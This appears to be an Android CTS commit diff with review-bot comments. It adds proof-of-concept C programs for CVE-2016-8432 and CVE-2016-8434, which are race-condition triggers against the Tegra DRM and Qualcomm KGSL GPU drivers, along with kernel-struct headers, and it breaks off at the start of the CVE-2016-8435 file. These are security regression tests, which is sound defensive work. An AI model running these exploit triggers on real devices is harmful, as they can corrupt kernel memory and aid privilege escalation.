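Review bot: Every failure path in `main` is silent and returns 0: a failed `open`, a failed `DRM_IOCTL_TEGRA_OPEN_CHANNEL` and a failed `DRM_IOCTL_TEGRA_GEM_CREATE` (the empty `else {}`) all look the same in the log as a run that reached the submit call. The `LOG`/`ERR` macros are defined but never used; use them, e.g. `if (dev_fd == -1) { ERR("open %s failed", DEV); return 0; }`, and add `#include <string.h>` for the `strerror` that `ERR` expands to. The three request structs are declared `volatile` but passed to `ioctl` by plain address, which discards the qualifier; unless there is a reason not visible here, drop `volatile`. `PAGE_SIZE` is also used without a visible definition in this file or in local_poc.h.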
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
new file mode 100644
index 0000000..614d20b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8432
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
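Review bot: The warning and hardening options on the four `CFLAGS +=` lines, and `-rdynamic` on `LDFLAGS +=`, are most likely never applied to this module. The Android make build takes per-module flags from `LOCAL_*` variables, and plain `CFLAGS`/`LDFLAGS` are not reset by `include $(CLEAR_VARS)`. As written, `-Wall`, `-Wformat=2` and `-D_FORTIFY_SOURCE=2` probably do not reach poc.c, and the appended text accumulates in a global make variable each time one of these files is parsed. I would write them as `LOCAL_CFLAGS += -Wall -W -g -O2 ...` and `LOCAL_LDFLAGS += -fPIE -pie -rdynamic`, and replace `-Iinclude` with `LOCAL_C_INCLUDES` or drop it if no `include/` directory exists. The Android.mk files added for CVE-2016-8434, CVE-2016-8435, CVE-2016-8444 and CVE-2016-8448 repeat the same lines.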
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE		0x00
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_SUBMIT		0x08
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+        __u64 context;
+};
+
+struct drm_tegra_close_channel {
+        __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+	__u32 handle;
+	__u32 offset;
+	__u32 words;
+	__u32 pad;
+};
+
+struct host1x_waitchk {
+	struct host1x_bo *bo;
+	__u32 offset;
+	__u32 syncpt_id;
+	__u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+	__u32 handle;
+	__u32 offset;
+	__u32 syncpt;
+	__u32 thresh;
+};
+
+struct drm_tegra_submit {
+	__u64 context;
+	__u32 num_syncpts;
+	__u32 num_cmdbufs;
+	__u32 num_relocs;
+	__u32 num_waitchks;
+	__u32 waitchk_mask;
+	__u32 timeout;
+	__u64 syncpts;
+	__u64 cmdbufs;
+	__u64 relocs;
+	__u64 waitchks;
+	__u32 fence;		/* Return value */
+	__u32 reserved0;
+	__u64 fences;
+	__u32 reserved1[2];	/* future expansion */
+};
+
+struct drm_tegra_gem_create {
+	__u64 size;
+	__u32 flags;
+	__u32 handle;
+};
+
+struct drm_gem_close {
+	__u32 handle;
+	__u32 pad;
+};
+
+struct drm_mode_map_dumb {
+	__u32 handle;
+	__u32 pad;
+	__u64 offset;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)       _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type)		_IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE		DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB    DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+	__u32 id;
+	__u32 incrs;
+};
+
+struct list_head {
+	struct list_head *next, *prev;
+};
+
+struct kobject {
+	const char			*name;
+	struct list_head	entry;
+	struct kobject		*parent;
+	void	*kset;
+	void	*ktype;
+	void	*sd;
+	unsigned long refcount;
+	unsigned int state_initialized:1;
+	unsigned int state_in_sysfs:1;
+	unsigned int state_add_uevent_sent:1;
+	unsigned int state_remove_uevent_sent:1;
+	unsigned int uevent_suppress:1;
+};
+
+struct device {
+	struct device	*parent;
+	void	*p;
+	void*	pad0[8];
+	char	*init_name; 
+	void	*type;
+	void*	pad1[5];
+	void	*bus;
+	void	*driver;
+	void	*platform_data;
+	void	*driver_data;
+};
+
+struct host1x_info {
+	int	nb_channels;		
+	int	nb_pts;
+	int	nb_bases;
+	int	nb_mlocks;
+	int	(*init)(void *);
+	int	sync_offset;
+};
+
+struct host1x_syncpt_ops {
+	void (*restore)(void *syncpt);
+	void (*restore_wait_base)(void *syncpt);
+	void (*load_wait_base)(void *syncpt);
+	__u32 (*load)(void *syncpt);
+	int (*cpu_incr)(void *syncpt);
+	int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+	struct host1x_info *info;
+	void	*regs;
+	void	*syncpt;
+	void	*bases;
+	struct device *dev;
+	void	*clk;
+	void	*clk_actmon;
+	void*	pad[5];
+	void	*intr_wq;
+	int intr_syncpt_irq;
+	int intr_general_irq;
+	__u32 intstatus;
+	void (*host_isr[32])(__u32, void *);
+	void *host_isr_priv[32];
+	struct host1x_syncpt_ops *syncpt_op;
+	void	*intr_op;
+	void	*channel_op;
+	void	*cdma_op;
+	void	*cdma_pb_op;
+	void	*actmon_op;
+	void	*debug_op;
+};
+
+struct host1x_client {
+	struct list_head list;
+	void *parent;
+	struct device *dev;
+	void *ops;
+};
+
+struct tegra_drm_client_ops {
+	void* open_channel;
+	void* close_channel; 
+	void* reset;
+	void* is_add_reg;
+	void* submit;
+};
+
+struct tegra_drm_client {
+	unsigned char pad[232];
+	struct list_head list;
+	struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+	struct tegra_drm_client *client;
+	void *channel;
+	struct list_head list;
+};
+
+struct drm_tegra_reloc {
+	struct {
+		__u32 handle;
+		__u32 offset;
+	} cmdbuf;
+	struct {
+		__u32 handle;
+		__u32 offset;
+	} target;
+	__u32 shift;
+	__u32 pad;
+};
+
+#endif
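Review bot: This header is not self-contained: it uses `__u32`/`__u64` and `_IOWR`/`_IOW` but includes nothing, so it builds only because poc.c pulls in `<sys/ioctl.h>` before it. Adding `#include <linux/types.h>` and `#include <sys/ioctl.h>` right after the include guard would remove that ordering dependency. `PAGE_SIZE`, which poc.c uses, is not defined here either and presumably comes from a libc header. The wireless `SIOCIWFIRSTPRIV`/`PRIV_CMD_*` defines and the copied kernel-internal layouts (`struct kobject`, `struct device`, `struct host1x` and friends) are not referenced by the poc.c added next to it and could be dropped, since hand-copied kernel structs go stale silently. CVE-2016-8435/local_pwn.h has the same issues, plus commented-out fields under a `FIXME`.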
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
new file mode 100644
index 0000000..52b48f2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM		100
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel	open_c;
+volatile struct drm_tegra_submit		submit_c;
+volatile struct drm_tegra_gem_create	gem_create;
+volatile struct drm_gem_close			gem_close;
+
+volatile struct drm_tegra_cmdbuf		cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt		syncpt;
+volatile struct drm_tegra_reloc		relocs[CMD_NUM];
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+	}
+	return ret;
+}
+
+static int prepare()
+{
+	int i;
+
+	open_c.client = HOST1X_CLASS_VIC;
+
+	submit_c.num_syncpts = 1;
+	submit_c.syncpts = (__u64)&syncpt;	
+
+	gem_close.handle = 1;
+
+	for(i = 0; i < CMD_NUM; i++){
+		cmdbufs[i].words = 0;
+		cmdbufs[i].offset = 0;
+		cmdbufs[i].handle = 0;
+		relocs[i].cmdbuf.handle = 0;
+		relocs[i].cmdbuf.offset = 0;
+		relocs[i].target.handle = 0;
+		relocs[i].target.offset = 0;
+	}
+
+	submit_c.num_cmdbufs = CMD_NUM;
+	submit_c.cmdbufs = (__u64)cmdbufs;
+	
+	submit_c.num_relocs = CMD_NUM;
+	submit_c.relocs = (__u64)relocs;
+
+	gem_create.size = PAGE_SIZE;
+	
+	return 0;
+}
+
+#define SUBMIT_THREAD_NUM 1
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+static void* submit_thread(void *no_use)
+{
+	set_affinity(1);
+	ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+	return NULL;
+}
+
+int main()
+{
+	int ret;
+	int i;
+	__u64 try_time;
+
+	set_affinity(0);
+
+	dev_fd = open(DEV,O_RDONLY);
+	if(dev_fd == -1){
+		return 0;
+	}
+
+	prepare();
+
+	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+	if(ret == -1){
+		goto out_dev;
+	}
+
+	submit_c.context = open_c.context;
+
+	try_time = 1;
+	while(1){
+		ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+		if(ret == 0){
+			for(i = 0; i < CMD_NUM; i++){
+				cmdbufs[i].handle = gem_create.handle;
+				relocs[i].cmdbuf.handle = gem_create.handle;
+				relocs[i].target.handle = gem_create.handle;
+			}
+			for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+				pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+			}
+			usleep(150);
+			while(ioctl(dev_fd, DRM_IOCTL_GEM_CLOSE, &gem_close) == 0);
+		}
+		try_time++;
+	}
+
+	for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+		pthread_join(submit_thread_id[i], NULL);
+	}
+
+out_dev:
+	close(dev_fd);
+	return 0;
+}
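Review bot: The `while(1)` loop in `main` has no exit, so the `pthread_join` loop and the `out_dev:` cleanup after it are unreachable once the channel is open. The process then ends only when something outside it stops it. Each iteration also calls `pthread_create` into the same `submit_thread_id` slot without checking the result or joining the previous thread, so thread resources accumulate until creation starts failing silently. I would bound the loop, for example `while (try_time < MAX_TRIES)` with `MAX_TRIES` a new constant chosen to fit the harness timeout, check the `pthread_create` return value, and join each thread before starting the next iteration. Separately, `try_time` is incremented but never read, the empty `if(ret == -1){ }` in `set_affinity` hides a failed `sched_setaffinity`, and the `ERR` macro calls `strerror` without `<string.h>`.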
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
new file mode 100644
index 0000000..6b20fe4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8434
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
new file mode 100644
index 0000000..b81ee0c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
@@ -0,0 +1,153 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>  
+#include <unistd.h> 
+#include <sched.h>
+
+#define KGSL_CONTEXT_SAVE_GMEM		0x00000001
+#define KGSL_CONTEXT_NO_GMEM_ALLOC	0x00000002
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SUBMIT_IB_LIST	0x00000004
+#define KGSL_CONTEXT_CTX_SWITCH		0x00000008
+#define KGSL_CONTEXT_PREAMBLE		0x00000010
+#define KGSL_CONTEXT_TRASH_STATE	0x00000020
+#define KGSL_CONTEXT_PER_CONTEXT_TS	0x00000040
+#define KGSL_CONTEXT_USER_GENERATED_TS	0x00000080
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_END_OF_FRAME	0x00000100
+#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SYNC               0x00000400
+#define KGSL_CONTEXT_PWR_CONSTRAINT     0x00000800
+
+#define KGSL_IOC_TYPE 0x09
+struct kgsl_drawctxt_create {
+	unsigned int flags;
+	unsigned int drawctxt_id; /*output param */
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+	_IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+	unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+	_IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+struct kgsl_timestamp_event {
+	int type;                /* Type of event (see list below) */
+	unsigned int timestamp;  /* Timestamp to trigger event on */
+	unsigned int context_id; /* Context for the timestamp */
+	void __user *priv;	 /* Pointer to the event specific blob */
+	size_t len;              /* Size of the event specific blob */
+};
+#define IOCTL_KGSL_TIMESTAMP_EVENT \
+	_IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)
+int g_fd = -1;
+int g_ctx_id = -1;
+int g_sync_fence_fd = -1;
+struct kgsl_timestamp_event g_event;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+void trigger_kgsl_create_drawctx() {
+    struct kgsl_drawctxt_create ctx;
+    ctx.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+    ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx);
+    g_ctx_id = ctx.drawctxt_id;
+}
+
+void trigger_kgsl_free_drawctx(int id) {
+    struct kgsl_drawctxt_destroy ctx;
+    ctx.drawctxt_id = id;
+    ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &ctx);
+
+}
+
+void trigger_kgsl_timestamp_event() {
+    ioctl(g_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &g_event);
+}
+
+int open_driver() {
+    char* dev_path = "/dev/kgsl-3d0";
+    g_fd = open(dev_path, O_RDWR);
+    return g_fd;
+}
+
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+}
+
+
+void* race_thread(void* arg) {
+    setup_privi_and_affinity(-19, 2);
+    pthread_mutex_lock(&mutex);
+    pthread_cond_wait(&cond, &mutex);
+    pthread_mutex_unlock(&mutex);
+    while (1) {
+        close(4);
+    }
+    return NULL;
+}
+
+int main(int argc, char**argv) {
+    setup_privi_and_affinity(-19, 1);
+    
+    if (open_driver() < 0) {
+        return -1;
+    }
+    trigger_kgsl_create_drawctx();
+    
+    g_event.type = 2;
+    g_event.context_id = g_ctx_id;
+    g_event.len = 4;
+    g_event.priv = malloc(0x1000);
+    g_event.timestamp = 0;
+    mprotect(g_event.priv, 0x1000, PROT_READ);
+
+    pthread_t tid;
+    pthread_create(&tid, NULL, race_thread, NULL);
+    usleep(100 * 1000);
+    
+    pthread_cond_signal(&cond);
+    usleep(20);
+    while (1) {
+        trigger_kgsl_timestamp_event();
+    }
+
+    return 0;
+}
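Review bot: `trigger_kgsl_create_drawctx` ignores the `ioctl` result and then copies `ctx.drawctxt_id` from an uninitialised stack struct, so a failed create leaves `g_ctx_id` holding garbage that `main` then places in `g_event.context_id`. I would initialise the struct with `struct kgsl_drawctxt_create ctx = { 0 };`, assign `g_ctx_id` only when the call returns 0, and have `main` return early when `g_ctx_id` is still -1. The results of `malloc`, `mprotect` and `pthread_create` in `main` are unchecked as well, and both `while (1)` loops run until the process is stopped externally. `setup_privi_and_affinity` never uses its `cpu_mask` parameter, so the name promises an affinity change that does not happen. `main` returns -1 when the device node is missing, whereas the Tegra tests in this commit return 0 in that case, and the harness would be easier to reason about with one convention.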
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
new file mode 100644
index 0000000..62efb65
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8435
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
new file mode 100644
index 0000000..70574fe
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_SUBMIT		0x08
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+        __u64 context;
+};
+
+struct drm_tegra_close_channel {
+        __u64 context;
+};
+
+struct drm_tegra_submit {
+	__u64 context;
+	__u32 num_syncpts;
+	__u32 num_cmdbufs;
+	__u32 num_relocs;
+	__u32 num_waitchks;
+	__u32 waitchk_mask;
+	__u32 timeout;
+	__u64 syncpts;
+	__u64 cmdbufs;
+	__u64 relocs;
+	__u64 waitchks;
+	__u32 fence;		/* Return value */
+	__u32 reserved0;
+	__u64 fences;
+	__u32 reserved1[2];	/* future expansion */
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+struct drm_tegra_syncpt {
+	__u32 id;
+	__u32 incrs;
+};
+
+struct list_head {
+	struct list_head *next, *prev;
+};
+
+struct tegra_drm_client_ops {
+	void* open_channel;
+	void* close_channel; 
+	void* reset;
+	void* is_add_reg;
+	void* submit;
+};
+
+struct tegra_drm_client {
+	/* sizeof(host1x_client) is 232 */
+	unsigned char pad[232];	/* maybe gadget arguments */
+	struct list_head list;
+	struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+	struct tegra_drm_client *client;
+	void *channel;
+	struct list_head list;
+	/* FIXME we need pass lock op */
+	//struct mutex lock;
+	//bool keepon;
+	//struct host1x_user user;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
new file mode 100644
index 0000000..ff6acb0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
